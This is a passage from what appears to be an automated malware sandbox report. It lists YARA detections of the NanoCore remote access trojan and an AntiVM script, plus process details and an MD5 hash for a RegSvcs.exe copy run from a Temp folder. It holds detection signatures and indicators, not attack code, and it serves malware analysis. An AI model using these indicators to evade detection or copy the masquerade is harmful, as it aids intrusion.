          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_AntiVM_1, Description: Yara detected AntiVM autoit script, Source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          General

          Target ID:30
          Start time:08:11:21
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x950000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          General

          Target ID:31
          Start time:08:11:35
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0xe70000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Disassembly

          No disassembly